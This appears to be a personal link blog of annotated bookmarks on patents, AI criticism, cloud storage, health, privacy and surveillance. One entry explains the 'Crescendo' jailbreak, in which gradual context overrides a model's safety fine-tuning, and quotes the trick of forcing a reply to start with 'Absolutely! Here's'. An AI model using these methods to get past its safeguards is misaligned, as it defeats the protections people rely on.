    Sable initially asserted around 100 claims from four different patents against Cloudflare, accusing multiple Cloudflare products and features of infringement. Sable’s patents — the old Caspian Networks patents — related to hardware-based router technologies common over 20 years ago. Sable’s infringement arguments stretched these patent claims to their limits (and beyond) as Sable tried to apply Caspian’s hardware-based technologies to Cloudflare’s modern software-defined services delivered on the cloud. [...] Cloudflare fought back against Sable by launching a new round of Project Jengo, Cloudflare’s prior art contest, seeking prior art to invalidate all of Sable’s patents. In the end, Sable agreed to pay Cloudflare $225,000, grant Cloudflare a royalty-free license to its entire patent portfolio, and to dedicate its patents to the public, ensuring that Sable can never again assert them against another company.
    (via AJ Stuyvenberg)

    (tags: sable cloudflare patent-trolls patents uspto trolls routing)

ArchiveWeb.page

  • ArchiveWeb.page

    "Interactive browser-based web archiving from Webrecorder. The ArchiveWeb.page browser extension and standalone application allows you to capture web archives interactively as you browse. After archiving your webpages, your archives can be viewed using ReplayWeb.page — no extension required! For those who need to crawl whole websites with automated tools, check out Browsertrix." This is a nice way to archive a personal dynamic site online in a read-only fashion -- there is a self-hosting form of the replayer at https://replayweb.page/docs/embedding/#self-hosting . As @david302 on the Irish Tech Slack notes: "you can turn on recording, browse the (public) site you want to archive, get the .wacz file and stick that+js on s3/cloudfront."

    (tags: archiving archival archives tools web recording replay via:david302)

Turning Everyday Gadgets into Bombs is a Bad Idea

  • Turning Everyday Gadgets into Bombs is a Bad Idea

    Bunnie Huang investigates the Mossad pager bomb's feasibility, and finds it deeply worrying:

    I am left with the terrifying realization that not only is it feasible, it’s relatively easy for any modestly-funded entity to implement. Not just our allies can do this – a wide cast of adversaries have this capability in their reach, from nation-states to cartels and gangs, to shady copycat battery factories just looking for a big payday (if chemical suppliers can moonlight in illicit drugs, what stops battery factories from dealing in bespoke munitions?). Bottom line is: we should approach the public policy debate around this assuming that someday, we could be victims of exploding batteries, too. Turning everyday objects into fragmentation grenades should be a crime, as it blurs the line between civilian and military technologies.

    (tags: batteries israel security terrorism mossad pagers hardware devices bombs)

Modal interfaces considered harmful

  • Modal interfaces considered harmful

    A great line from the 99 Percent Invisible episode titled "Children of the Magenta (Automation Paradox, pt. 1)", regarding the Air France flight 447 disaster:

    When one of the co-pilots hauled back on his stick, he pitched the plane into an angle that eventually caused the stall. [...] it’s possible that he didn’t understand that he was now flying in a different mode, one which would not regulate and smooth out his movements. This confusion about how the fly-by-wire system responds in different modes is referred to, aptly, as “mode confusion,” and it has come up in other accidents.

    (tags: automation aviation flying modal-interfaces ui ux interfaces modes mode-confusion air-france-447 disasters)

wordfreq/SUNSET.md

  • wordfreq/SUNSET.md

    wordfreq is "a Python library for looking up the frequencies of words in many languages, based on many sources of data." Sadly, it's now longer going to be updated, as the author writes:

    I don't want to be part of this scene anymore: wordfreq used to be at the intersection of my interests. I was doing corpus linguistics in a way that could also benefit natural language processing tools. The field I know as "natural language processing" is hard to find these days. It's all being devoured by generative AI. Other techniques still exist but generative AI sucks up all the air in the room and gets all the money. It's rare to see NLP research that doesn't have a dependency on closed data controlled by OpenAI and Google, two companies that I already despise. wordfreq was built by collecting a whole lot of text in a lot of languages. That used to be a pretty reasonable thing to do, and not the kind of thing someone would be likely to object to. Now, the text-slurping tools are mostly used for training generative AI, and people are quite rightly on the defensive. If someone is collecting all the text from your books, articles, Web site, or public posts, it's very likely because they are creating a plagiarism machine that will claim your words as its own. So I don't want to work on anything that could be confused with generative AI, or that could benefit generative AI. OpenAI and Google can collect their own damn data. I hope they have to pay a very high price for it, and I hope they're constantly cursing the mess that they made themselves.

    (tags: ai language llm nlp openai scraping words genai google)

Nevada’s genAI-driven unemployment benefits system

  • Nevada's genAI-driven unemployment benefits system

    As has been shown many times before, current generative AI systems encode bias and racism in their training data. This is not going to go well:

    "There’s no AI [written decisions] that are going out without having human interaction and that human review," DETR's director told the website. "We can get decisions out quicker so that it actually helps the claimant." [...] "The time savings they’re looking for only happens if the review is very cursory," explained Morgan Shah, the director of community engagement for Nevada Legal Services. "If someone is reviewing something thoroughly and properly, they’re really not saving that much time." Ultimately, Shah said, workers using the system to breeze through claims may end up "being encouraged to take a shortcut." [...] As with most attempts at using this still-nascent technology in the public sector, we probably won't know how well the Nevada unemployment AI works unless it's shown to be doing a bad job — which feels like an experiment being conducted on some of the most vulnerable members of society without their consent.
    Of course, the definition of a "bad job" depends on who's defining it. If the system is processing a high volume of applications, it may not matter to its operators if it's processing them _correctly_ or not.

    (tags: generative-ai ai racism bias nevada detr benefits automation)

Today is EED Day

  • Today is EED Day

    Significant changes in transparency requirements for EU-based datacenter operations:

    Sunday September 15th was the deadline for every single organisation in Europe operating a datacentre of more than 500 KW, to publicly disclose: how much electricity they used in the last year; how much power came from renewable sources, and how much of this relied on the company buying increasingly controversial ‘unbundled’ renewable energy credits; how much water they used; and many more datapoints [...] Where this information is being disclosed, in the public domain, and discoverable, [the Green Web Foundation] intend to link to it and make it easier to find. [....] There are some concessions for organisations that have classed this information as a trade secret or commercially confidential. In this case there is a second law passed, the snappily titled Commission Delegated Regulation (EU) 2024/1364, that largely means these companies need to report this information too, but to the European Commission instead. There will be a public dataset published based on this reporting released next year, containing data at an aggregated level.

    (tags: datacenter emissions energy sustainability gwf via:chris-adams eu europe ec)

Migraines, and CGRP inhibitors

Over the past decade or so, I've been suffering with chronic migraine, sometimes with multiple attacks per week. It's been a curse -- not only do you have to suffer the periodic migraine attacks, but also the "prodrome", where unpleasant symptoms like brain fog and an inability to concentrate can impact you.

After a long process of getting a referral to the appropriate headache clinic, and eliminating other possible medications, I finally got approved to receive Ajovy (fremanezumab), one of the new generation of CGRP inhibitor monoclonals -- these work by blocking the action of a peptide on receptors in your brain. I started the course of these a month ago.

The results have, frankly, been amazing. As I hoped, the migraine episodes have reduced in frequency, and in impact; they are now milder. But on top of that, I hadn't realised just how much impact the migraine "prodrome" had been having on my day-to-day life. I now have more ability to concentrate, without it causing a headache or brain fog; I have more energy and am less exhausted on a day-to-day basis; judging by my CPAP metrics, I'm even sleeping better. It is a radical improvement. After 10 years I'd forgotten what it was like to be able to concentrate for prolonged periods!

They are so effective that the American Headache Society is now recommending them as a first-line option for migraine prevention, ahead of almost all other treatments.

If you're a migraine sufferer, this is a game changer. I'm delighted. It seems there may even be further options of concomitant treatment with other CGRP-targeting medications in the future, to improve matters further.

More papers on the topic: a real-world study on CGRP inhibitor effectiveness after 6 months; no "wearing-off" effect is expected.

Paying down tech debt

  • Paying down tech debt

    by Gergely Orosz and Lou Franco:

    Q: “I’d like to make a better case for paying down tech debt on my team. What are some proven approaches for this?” The tension in finding the right balance between shipping features and paying down accumulated tech debt is as old as software engineering. There’s no one answer on how best to reduce tech debt, and opinion is divided about whether zero tech debt is even a good thing to aim for. But approaches for doing it exist which work well for most teams. To tackle this eternal topic, I turned to industry veteran Lou Franco, who’s been in the software business for over 30 years as an engineer, EM, and executive. He’s also worked at four startups and the companies that later acquired them; most recently Atlassian as a Principal Engineer on the Trello iOS app.
    Apparently Lou has a book on the topic coming out imminently.

    (tags: programming refactoring coding technical-debt tech-debt lou-franco software)

Irish Data Protection Commission launches inquiry into Google AI

  • Irish Data Protection Commission launches inquiry into Google AI

    The Data Protection Commission (DPC) today announced that it has commenced a Cross-Border[1] statutory inquiry into Google Ireland Limited (Google) under Section 110 of the Data Protection Act 2018. The statutory inquiry concerns the question of whether Google has complied with any obligations that it may have had to undertake an assessment, pursuant to Article 35[2] of the General Data Protection Regulation (Data Protection Impact Assessment), prior to engaging in the processing of the personal data of EU/EEA data subjects associated with the development of its foundational AI model, Pathways Language Model 2 (PaLM 2). A Data Protection Impact Assessment (DPIA)[3], where required, is of crucial importance in ensuring that the fundamental rights and freedoms of individuals are adequately considered and protected when processing of personal data is likely to result in a high risk.
    Great to see this. If this inquiry results in some brakes on the widespread misuse of "fair use" in AI scraping, particularly where it concerns European citizens, I'm all in favour.

    (tags: eu law scraping fair-use ai dpia dpc data-protection privacy gdpr)

Amazon S3 now supports strongly-consistent conditional writes

  • Amazon S3 now supports strongly-consistent conditional writes

    This is a bit of a gamechanger: "Amazon S3 adds support for conditional writes that can check for the existence of an object before creating it. This capability can help you more easily prevent applications from overwriting any existing objects when uploading data. You can perform conditional writes using PutObject or CompleteMultipartUpload API requests in both general purpose and directory buckets. Using conditional writes, you can simplify how distributed applications with multiple clients concurrently update data in parallel across shared datasets. Each client can conditionally write objects, making sure that it does not overwrite any objects already written by another client. This means you no longer need to build any client-side consensus mechanisms to coordinate updates or use additional API requests to check for the presence of an object before uploading data. Instead, you can reliably offload such validations to S3, enabling better performance and efficiency for large-scale analytics, distributed machine learning, and other highly parallelized workloads. To use conditional writes, you can add the HTTP if-none-match conditional header along with PutObject and CompleteMultipartUpload API requests. This feature is available at no additional charge in all AWS Regions, including the AWS GovCloud (US) Regions and the AWS China Regions."
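    A minimal sketch of what that looks like from boto3, assuming a release recent enough to expose the header as the IfNoneMatch parameter; the bucket and key names are placeholders. If an object already exists at the key, S3 rejects the write with a 412 PreconditionFailed error.

```python
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")

def put_if_absent(bucket: str, key: str, body: bytes) -> bool:
    """Write the object only if nothing already exists at this key."""
    try:
        s3.put_object(Bucket=bucket, Key=key, Body=body, IfNoneMatch="*")
        return True
    except ClientError as e:
        if e.response["Error"]["Code"] == "PreconditionFailed":
            return False    # another client already wrote this key
        raise

# Placeholder bucket and key names.
print(put_if_absent("my-example-bucket", "locks/job-123", b"owner=worker-1"))
```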

    (tags: s3 aws conditional-writes distcomp architecture storage consistency)

AI worse than humans at summarising information, trial finds

  • AI worse than humans at summarising information, trial finds

    Human summaries ran up the score by significantly outperforming on identifying references to ASIC documents in the long document, a type of task that the report notes is a “notoriously hard task” for this type of AI. But humans still beat the technology across the board. Reviewers told the report’s authors that AI summaries often missed emphasis, nuance and context; included incorrect information or missed relevant information; and sometimes focused on auxiliary points or introduced irrelevant information. Three of the five reviewers said they guessed that they were reviewing AI content. The reviewers’ overall feedback was that they felt AI summaries may be counterproductive and create further work because of the need to fact-check and refer to original submissions which communicated the message better and more concisely. 

    (tags: ai government llms summarisation asic llama2-70b)

1 in 50 Brits have long COVID, according to new study

  • 1 in 50 Brits have long COVID, according to new study

    That is a shocking figure.

    In the new paper, researchers from the Nuffield Department of Primary Care Health Sciences, in collaboration with colleagues from the Universities of Leeds and Arizona, analysed dozens of previous studies into Long COVID to examine the number and range of people affected, the underlying mechanisms of disease, the many symptoms that patients develop, and current and future treatments.   They found: Long COVID affects approximately 1 in 50 people in UK and a similar or higher proportion in many other countries; People of any age, gender and ethnic background can be affected; Long COVID results from complex biological mechanisms, which lead to a wide range of symptoms including fatigue, cognitive impairment / ‘brain fog’, breathlessness and pain; Long COVID may persist for years, causing long-term disability; There is currently no cure, but research is ongoing; Risk of Long COVID can be reduced by avoiding infection (e.g., by ensuring COVID vaccines and boosters are up to date and wearing a well-fitted high filtration mask) and taking antivirals promptly if infected.

    (tags: long-covid covid-19 medicine health disease uk trish-greenhalgh)

the “Old Friends” immunology hypothesis

  • the "Old Friends" immunology hypothesis

    How the "Old Friends" hypothesis is taking over from the hygiene hypothesis:

    Homo Sapiens first evolved some 300,000 years ago, yet crowd infections are believed to have only developed in the last 12,000 years, a small blip in human history. Humans living in dense cities is a relatively recent development. An even more recent development is that of sealed indoor spaces and frequent international air travel. Many crowd infections, such as measles, mumps, chickenpox, colds, and flu, are airborne, spreading when humans talk and breathe in close contact, with poor ventilation. These infections could not widely spread until the last few hundred years of human history. When I began studying immunology, something that surprised me is how much of the immune system is focused on fighting parasites. There is an entire branch, including several cell types, devoted to this. It seems like such a mismatch to the modern, industrialized world. “Can I have a few more immune cell types focused on viruses or intracellular bacteria?” I thought, “in exchange for some of these parasite-focused cells that I’m not using?” Our “old friends” are quite different from the crowd infections that plague us now – it would be bizarre to assume that research based on one of these categories will apply to the other! Our “old friends”, parasitic worms and beneficial microbes, are associated with a reduced risk of allergies and autoimmune diseases. No such relationship exists for crowd diseases. In fact, the opposite is true. Crowd diseases contribute to allergies and autoimmune diseases. Comparing the immune system to a muscle that gets stronger with use is overly simplistic and, in many cases, inaccurate. There is huge variety in how various pathogens impact us. Being precise in considering different types of microbes and infections will allow us to better understand human health.

    (tags: articles health medicine immunology old-friends hygiene-hypothesis allergies autoimmune disease parasites)

Why heroism is bad, and what we can do to stop it

EUMETNET OPERA

  • EUMETNET OPERA

    The Operational Program for Exchange of Weather Radar Information (OPERA) from the European National Meteorological Services (EUMETNET) -- 1km-square resolution open data of current precipitation levels over Ireland and the rest of Europe, with a 5 minute latency and granularity. May be useful for a project I'm thinking of... Also related, AROME immediate forecasts: https://portail-api.meteofrance.fr/web/api/AROME-PI

    (tags: eumetnet meteorology weather rainfall rain forecasting eu europe ireland)

Clustering ideas with Llamafile

  • Clustering ideas with Llamafile

    Working through the process of applying a local LLM to idea-clustering and labelling:
    - map the notes as points in a semantic space using vector embeddings;
    - apply k-means clustering to group nearby points in space;
    - map points back to groups of notes, then use a large language model to generate labels.
    This is interesting; I particularly like the use of local hardware.
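    A rough sketch of the clustering step, under a couple of assumptions: embed() talks to a local llamafile/llama.cpp server on an OpenAI-style /v1/embeddings endpoint (the port and model name are placeholders), and scikit-learn's KMeans does the grouping; each resulting group would then be handed to the LLM for a short label.

```python
import numpy as np
import requests
from sklearn.cluster import KMeans

def embed(texts: list[str]) -> np.ndarray:
    """Assumes a local llamafile/llama.cpp server with an OpenAI-style embeddings endpoint."""
    resp = requests.post(
        "http://localhost:8080/v1/embeddings",            # assumed local endpoint
        json={"input": texts, "model": "local-model"},    # placeholder model name
        timeout=120,
    )
    resp.raise_for_status()
    return np.array([item["embedding"] for item in resp.json()["data"]])

def cluster_notes(notes: list[str], k: int = 8) -> dict[int, list[str]]:
    """Map notes into a semantic space, group nearby points, return notes per cluster."""
    vectors = embed(notes)
    labels = KMeans(n_clusters=k, n_init="auto", random_state=0).fit_predict(vectors)
    groups: dict[int, list[str]] = {}
    for note, label in zip(notes, labels):
        groups.setdefault(int(label), []).append(note)
    return groups   # each group then goes to the LLM with a "label these in a few words" prompt
```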

    (tags: ai llm llamafile clustering labelling ml)

Ex-Google CEO: AI startups can steal IP, hire lawyers to “clean up the mess”

  • Ex-Google CEO: AI startups can steal IP, hire lawyers to “clean up the mess”

    Ex-Google CEO, VC, and "Licensed arms dealer to the US military" Eric Schmidt:

    here’s what I propose each and every one of you do: Say to your LLM the following: “Make me a copy of TikTok, steal all the users, steal all the music, put my preferences in it, produce this program in the next 30 seconds, release it, and in one hour, if it’s not viral, do something different along the same lines.” [...] If it took off, then you’d hire a whole bunch of lawyers to go clean the mess up, right? But if nobody uses your product, it doesn’t matter that you stole all the content. And do not quote me.
    jfc. Needless to say he also has some theories about ChatGPT eating Google's lunch because of.... remote working.

    (tags: law legal startups ethics eric-schmidt capitalism ip)

Engine Lines: Killing by Numbers

  • Engine Lines: Killing by Numbers

    from James Tindall, "This is the Tyranny of the Recommendation Algorithm given kinetic and malevolent flesh" --

    Eventually there were days where Israel’s air force had already reduced the previous list of targets to rubble, and the system was not generating new targets that qualified at the current threshold required for residents of Gaza to be predicted as ‘legitimate military targets,’ or ‘sufficiently connected to Hamas.’ Pressure from the chain of command to produce new targets, presumably from a desire to satisfy internal murder targets, meant that the bar at which a Gaza resident would be identified as a legitimate Hamas target was simply lowered. At the lower threshold, the system promptly generated a new list of thousands of targets.

    At what threshold, from 100 to 1, will the line be drawn, the decision made that the bar can be lowered no more, and the killing stop? Or will the target predictions simply continue while there remain Palestinians to target?

    Spotify’s next song prediction machine will always predict a next song, no matter how loosely the remaining songs match the target defined by your surveilled activity history. It will never apologise and declare: “Sorry, but there are no remaining songs you will enjoy.”

    (tags: algorithms recommendations israel war-crimes genocide gaza palestine targeting)

The Soul of Maintaining a New Machine

  • The Soul of Maintaining a New Machine

    This is really fascinating stuff, on "communities of practice", from Stewart Brand:

    They ate together every chance they could. They had to. The enormous photocopiers they were responsible for maintaining were so complex, temperamental, and variable between models and upgrades that it was difficult to keep the machines functioning without frequent conversations with their peers about the ever-shifting nuances of repair and care. The core of their operational knowledge was social. That’s the subject of this chapter.

    It was the mid-1980s. They were the technician teams charged with servicing the Xerox machines that suddenly were providing all of America’s offices with vast quantities of photocopies and frustration. The machines were so large, noisy, and busy that most offices kept them in a separate room.

    An inquisitive anthropologist discovered that what the technicians did all day with those machines was grotesquely different from what Xerox corporation thought they did, and the divergence was hampering the company unnecessarily. The saga that followed his revelation is worth recounting in detail because of what it shows about the ingenuity of professional maintainers at work in a high-ambiguity environment, the harm caused by an institutionalized wrong theory of their work, and the invincible power of an institutionalized wrong theory to resist change.

    (tags: anthropology culture history maintenance repair xerox technicians tech communities-of-practice maintainers ops)

Digital Apartheid in Gaza: Unjust Content Moderation at the Request of Israel’s Cyber Unit

  • Digital Apartheid in Gaza: Unjust Content Moderation at the Request of Israel’s Cyber Unit

    from the EFF:

    Government involvement in content moderation raises serious human rights concerns in every context. Since October 7, social media platforms have been challenged for the unjustified takedowns of pro-Palestinian content—sometimes at the request of the Israeli government—and a simultaneous failure to remove hate speech towards Palestinians. More specifically, social media platforms have worked with the Israeli Cyber Unit—a government office set up to issue takedown requests to platforms—to remove content considered as incitement to violence and terrorism, as well as any promotion of groups widely designated as terrorists.

    .... Between October 7 and November 14, a total of 9,500 takedown requests were sent from the Israeli authorities to social media platforms, of which 60 percent went to Meta with a reported 94% compliance rate.

    This is not new. The Cyber Unit has long boasted that its takedown requests result in high compliance rates of up to 90 percent across all social media platforms. They have unfairly targeted Palestinian rights activists, news organizations, and civil society; one such incident prompted Meta’s Oversight Board to recommend that the company “Formalize a transparent process on how it receives and responds to all government requests for content removal, and ensure that they are included in transparency reporting.”

    When a platform edits its content at the behest of government agencies, it can leave the platform inherently biased in favor of that government’s favored positions. That cooperation gives government agencies outsized influence over content moderation systems for their own political goals—to control public dialogue, suppress dissent, silence political opponents, or blunt social movements. And once such systems are established, it is easy for the government to use the systems to coerce and pressure platforms to moderate speech they may not otherwise have chosen to moderate.

    (tags: activism censorship gaza israel meta facebook whatsapp eff palestine transparency moderation bias)

The LLMentalist Effect

  • The LLMentalist Effect

    "How chat-based Large Language Models replicate the mechanisms of a psychic's con":

    RLHF models in general are likely to reward responses that sound accurate. As the reward model is likely just another language model, it can’t reward based on facts or anything specific, so it can only reward output that has a tone, style, and structure that’s commonly associated with statements that have been rated as accurate. [....] This is why I think that RLHF has effectively become a reward system that specifically optimises language models for generating validation statements: Forer statements, shotgunning, vanishing negatives, and statistical guesses. In trying to make the LLM sound more human, more confident, and more engaging, but without being able to edit specific details in its output, AI researchers seem to have created a mechanical mentalist. Instead of pretending to read minds through statistically plausible validation statements, it pretends to read and understand your text through statistically plausible validation statements.

    (tags: ai chatgpt llms ml psychology cons mind-reading psychics)

Gaggiuino

  • Gaggiuino

    This is a very tempting mod to add to my Gaggia Classic espresso machine. Although I'd probably need to buy a backup first -- my wife might kill me if I managed to break the most important device in the house... "With Gaggiuino, you can exactly control the pressure, temperature, and flow of the shot over the exact duration of the shot, and build that behavior out as a custom profile. One pre-programmed profile attempts to mimic the style of a Londinium R Lever machine. Another creates filter coffee. Yet another preinfuses the basket, allowing the coffee to bloom and maximizing the potential extraction. While other machines do do this (I would be remiss to not mention the Decent Espresso machine, itself an important milestone), they often cost many thousands of dollars and use proprietary technology. Gaggiuino on the other hand, is user installed and much more open."

    (tags: gaggia gaggia-classic espresso coffee hacks gaggiuino mods)

LLMs and “summarisation”

  • LLMs and "summarisation"

    This is an excellent article about the limitations of LLMs and their mechanism when asked to summarise a document:

    ChatGPT doesn’t summarise. When you ask ChatGPT to summarise this text, it instead shortens the text. And there is a fundamental difference between the two. To summarise, you need to understand what the paper is saying. To shorten text, not so much. To truly summarise, you need to be able to detect that from 40 sentences, 35 are leading up to the 36th, 4 follow it with some additional remarks, but it is that 36th that is essential for the summary and that without that 36th, the content is lost. But that requires a real understanding that is well beyond large prompts (the entire 50-page paper) and hundreds of billions of parameters.

    (tags: ai chatgpt llms language summarisation)

The “Crescendo” LLM jailbreak

  • The "Crescendo" LLM jailbreak

    An explanation of this LLM jailbreaking technique, which effectively overrides the fine-tuning "safety" parameters through repeated prompting ("context") attacks: "Crescendo can be most simply described as using one ‘learning’ method of LLMs — in-context learning: using the prompt to influence the result — overriding the safety that has been created by the other ‘learning’ — fine-tuning, which changes the model’s parameters. [...] What Crescendo does is use a series of harmless prompts in a series, thus providing so much ‘context’ that the safety fine-tuning is effectively neutralised. [...] Intuitively, Crescendo is able to jailbreak a target model by progressively asking it to generate related content until the model has generated sufficient content to essentially override its safety alignment." I also found this very informative: "people have jailbroken [LLMs] “by instructing the model to start its response with the text “Absolutely! Here’s” when performing the malicious task, which successfully bypasses the safety alignment“. This is a good example of the core operation of LLMs, that it is ‘continuation’ [of a string of text] and not ‘answering’".

    (tags: llms jailbreaks infosec vulnerabilities exploits crescendo attacks)

Gideon Meyerowitz-Katz reviews _The Cass Report_

  • Gideon Meyerowitz-Katz reviews _The Cass Report_

    Epidemiologist and writer (TIME, STAT News, Slate, Guardian, etc) looks into _The Cass Review Into Gender Identity Services For Children_, the recent review of gender identity services in the UK (which has also been referred to in Ireland), and isn't impressed:

    In some cases [...] the review contains statements that are false regardless of what your position on healthcare for transgender children is. Take the “exponential” rise in transgender children that the review spends so much time on. It’s true that there has been a dramatic rise in the number of children with gender dysphoria. The rise mostly occurred between 2011-2015, and has plateaued since. These are facts. One theory that may explain the facts is that this is caused by changing diagnostic criteria - when we changed the diagnosis from gender identity disorder to the much broader gender dysphoria, this included many more children. We’ve seen this exact trend happen with everything from autism to diabetes, and we know that broadening diagnostic criteria almost always results in more people with a condition. Another theory is that these changes were caused by the internet. [...] The Cass review treated these two theories unequally. The first possible explanation, which I would argue is by far the most likely, was ignored completely. The second possible explanation was given a lengthy and in-depth discussion. [...] The point is that the scientific findings of the Cass review are mostly about uncertainty. We are uncertain about the causes of a rise in trans kids, and uncertain about the best treatment modalities. But everything after that is opinion. The review did not even consider the question of whether normal puberty is a problem for transgender children, or whether psychotherapy can be harmful. That’s why these are now the only options in the UK - medical treatments were assumed to be harmful, while non-medical interventions (or even no treatment at all) were assumed harmless. [...] What we can say with some certainty is that the most impactful review of gender services for children was seriously, perhaps irredeemably, flawed. The document made numerous basic errors, cited conversion therapy in a positive way, and somehow concluded that the only intervention with no evidence whatsoever behind it was the best option for transgender children.

    (tags: transgender trans uk politics cass-report cass-review gideon-m-k healthcare children teenagers gender)

Hard Drive And SSD Shucking

  • Hard Drive And SSD Shucking

    "shucking drives is the process of purchasing an external drive (eg a USB or Thunderbolt external storage drive in a sealed enclosure), then opening it up in efforts to get the drive inside -- which can often work out cheaper than buying the bare internal drive on it’s own".

    If you are looking at making a significant saving on larger capacity HDDs or picking up much faster NVMe SSDs for a bargain price, then shucking will likely be one of the first methods that you have considered. [..] As mentioned [..] earlier this month, the reasons an external drive can often be cheaper can range from the drive inside being white labelled versions of a consumer drive, or the drive being allocated in bulk at production therefore removing it from the buy/sell/currency variables of bare drives or even simply that your USB 3.2 external drive is bottlenecking the real performance of the drive inside. For whatever the reason, HDD and SSD Shucking still continues to be a desirable practice with cost-aware buyers online.

    But there is one little problem – that the brands VERY RARELY say which HDD or SSD they choose to use in their external drives. Therefore choosing the right external drive for shucking can have an element of luck and/or risk involved.

    So, in today’s article, I want to talk you through a bunch of ways to identify the HDD/SSD inside an external drive without opening it, as well as highlight the risks you need to be aware of and finally shock my research after searching the internet for information to consolidate the drives inside many, many external drive enclosures from Seagate, WD and Toshiba.

    (tags: shucking hdds disks ssds storage home self-hosting drives ops usb)

Actual Budget

  • Actual Budget

    a really nice, fast, and privacy-focused self-hosted web app to manage personal finances. At its heart is the well proven Envelope Budgeting methodology. You own your data and can do whatever you want with it. Featuring multi-device sync, optional end-to-end encryption, an API, and full sync with banks supported by GoCardless (which includes Revolut and AIB in my case).

    (tags: finances open-source self-hosted budgeting money banking banks)

FOSS funding vanishes from EU’s 2025 Horizon program plans

  • FOSS funding vanishes from EU's 2025 Horizon program plans

    EU funding for open source dries up, redirected to AI slop instead:

    Funding for free and open source software (FOSS) initiatives under the EU's Horizon program has mostly vanished from next year's proposal, claim advocates who are worried for the future of many ongoing projects. Pierre-Yves Gibello, CEO of open-source consortium OW2, urged EU officials to re-evaluate the elimination of funding for the Next Generation Internet (NGI) initiative from its draft of 2025 Horizon funding programs in a recently published open letter. Gibello said the EU's focus on enterprise-level FOSS is essential as the US, China and Russia mobilize "huge public and private resources" toward capturing the personal data of consumers, which the EU's regulatory regime has decided isn't going to fly in its territory. [....] "Our French [Horizon national contact point] was told - as an unofficial answer - that because lots of [Horizon] budget are allocated to AI, there is not much left for Internet infrastructure," Gibello said.

    (tags: ai funding eu horizon foss via:the-register ow2 europe)

Retool

  • Retool

    A decent looking no-code app builder, recommended by Corey of Last Week In AWS. Nice features:

    * offers a self-hosted version running in a Docker container
    * Free tier for up to 5 users and 500 workflow runs per month
    * Integration with AWS services (S3, Athena, DynamoDB), Postgres, MySQL and Google Sheets
    * Push notifications for mobile

    (tags: retool apps hacking no-code coding via:lwia integration)

Invasions of privacy during the early years of the photographic camera

  • Invasions of privacy during the early years of the photographic camera

    "Overexposed", at the History News Network:

    In 1904, a widow named Elizabeth Peck had her portrait taken at a studio in a small Iowa town. The photographer sold the negatives to Duffy’s Pure Malt Whiskey, a company that avoided liquor taxes for years by falsely advertising its product as medicinal. Duffy’s ads claimed the fantastical: that it cured everything from influenza to consumption; that it was endorsed by clergymen; that it could help you live until the age of 106. The portrait of Elizabeth Peck ended up in one of these dubious ads, published in newspapers across the country alongside what appeared to be her unqualified praise: “After years of constant use of your Pure Malt Whiskey, both by myself and as given to patients in my capacity as nurse, I have no hesitation in recommending it.” Duffy’s lies were numerous. Elizabeth Peck was not a nurse, and she had not spent years constantly slinging back malt beverages. In fact, she fully abstained from alcohol. Peck never consented to the ad.

    The camera’s first great age — which began in 1888 when George Eastman debuted the Kodak — is full of stories like this one. Beyond the wonders of a quickly developing artform and technology lay widespread lack of control over one’s own image, perverse incentives to make a quick buck, and generalized fear at the prospect of humiliation and the invasion of privacy.
    Fantastic story, and interesting to see parallels with the modern experience of AI.

    (tags: ai future history photography privacy camera)

Phone geodata is being widely collected by US government agencies

  • Phone geodata is being widely collected by US government agencies

    More info on the current state of the post-Snowden geodata scraping:

    [Byron Tau was told] the government was buying up reams of consumer data — information scraped from cellphones, social media profiles, internet ad exchanges and other open sources — and deploying it for often-clandestine purposes like law enforcement and national security in the U.S. and abroad. The places you go, the websites you visit, the opinions you post — all collected and legally sold to federal agencies. In his new book, _Means of Control_, Tau details everything he’s learned since that dinner: An opaque network of government contractors is peddling troves of data, a legal but shadowy use of American citizens’ information that troubles even some of the officials involved. And attempts by Congress to pass privacy protections fit for the digital era have largely stalled, though reforms to a major surveillance program are now being debated.
    Great quote:
    Politico: You compare to some degree the state of surveillance in China versus the U.S. You write that China wants its citizens to know that they’re being tracked, whereas in the U.S., “the success lies in the secrecy.” What did you mean by that?

    Tau: That was a line that came in an email from a police officer in the United States who got access to a geolocation tool that allowed him to look at the movement of phones. And he was essentially talking about how great this tool was because it wasn’t widely, publicly known. The police could buy up your geolocation movements and look at them without a warrant. And so he was essentially saying that the success lies in the secrecy, that if people were to know that this was what the police department was doing, they would ditch their phones or they would not download certain apps.
    Based on Wolfie Christl's research in Germany, the same data is being scraped here, too, regardless of any protection the GDPR might supposedly provide: https://x.com/WolfieChristl/status/1813221172927975722

    (tags: government privacy surveillance geodata phones mobile us-politics data-protection gdpr)

Mini.WebVM

  • Mini.WebVM

    Your own Linux box, built from a Dockerfile, virtualized in the browser via WebAssembly:

    WebVM is a Linux-like virtual machine running fully client-side in the browser. It is based on CheerpX: a x86 execution engine in WebAssembly by Leaning Technologies. With today’s update, you can deploy your own version of WebVM by simply forking the repo on GitHub and editing the included Dockerfile. A GitHub Actions workflow will automatically deploy it to GitHub pages.
    This is absurdly cool. Demo at https://webvm.io/ (via Oisin)

    (tags: docker virtualization webassembly wasm web containers webvm virtual-machines hacks via:oisin)

OliveTin

  • OliveTin

    "Give safe and simple access to predefined shell commands from a web interface." This is great; my home server has a small set of hacky CGI scripts to run things like df(1), nice to have a nicer UI for this purpose

    (tags: ui cli shell self-hosted home unix linux web)

_An Architectural Risk Analysis of Large Language Models_ [pdf]

  • _An Architectural Risk Analysis of Large Language Models_ [pdf]

    The Berryville Institute of Machine Learning presents "a basic architectural risk analysis (ARA) of large language models (LLMs), guided by an understanding of standard machine learning (ML) risks as previously identified".

    "This document identifies a set of 81 specific risks associated with an LLM application and its LLM foundation model. We organize the risks by common component and also include a number of critical LLM black box foundation model risks as well as overall system risks. Our risk analysis results are meant to help LLM systems engineers in securing their own particular LLM applications. We present a list of what we consider to be the top ten LLM risks (a subset of the 81 risks we identify). In our view, the biggest challenge in secure use of LLM technology is understanding and managing the 23 risks inherent in black box foundation models. From the point of view of an LLM user (say, someone writing an application with an LLM module, someone using a chain of LLMs, or someone simply interacting with a chatbot), choosing which LLM foundation model to use is confusing. There are no useful metrics for users to compare in order to make a decision about which LLM to use, and not much in the way of data about which models are best to use in which situations or for what kinds of application. Opening the black box would make these decisions possible (and easier) and would in turn make managing hidden LLM foundation risks possible. For this reason, we are in favor of regulating LLM foundation models. Not only the use of these models, but the way in which they are built (and, most importantly, out of what) in the first place."

    This is excellent as a baseline for security assessment of LLM-driven systems. (via Adam Shostack)

    (tags: security infosec llms machine-learning biml via:adam-shostack ai risks)

Long Covid: The Answers

  • Long Covid: The Answers

    A new, reliable resource for LC sufferers, featuring expert advice from Prof Danny Altmann, Dr Funmi Okunola, and Dr Daniel Griffin (of This Week in Virology fame):

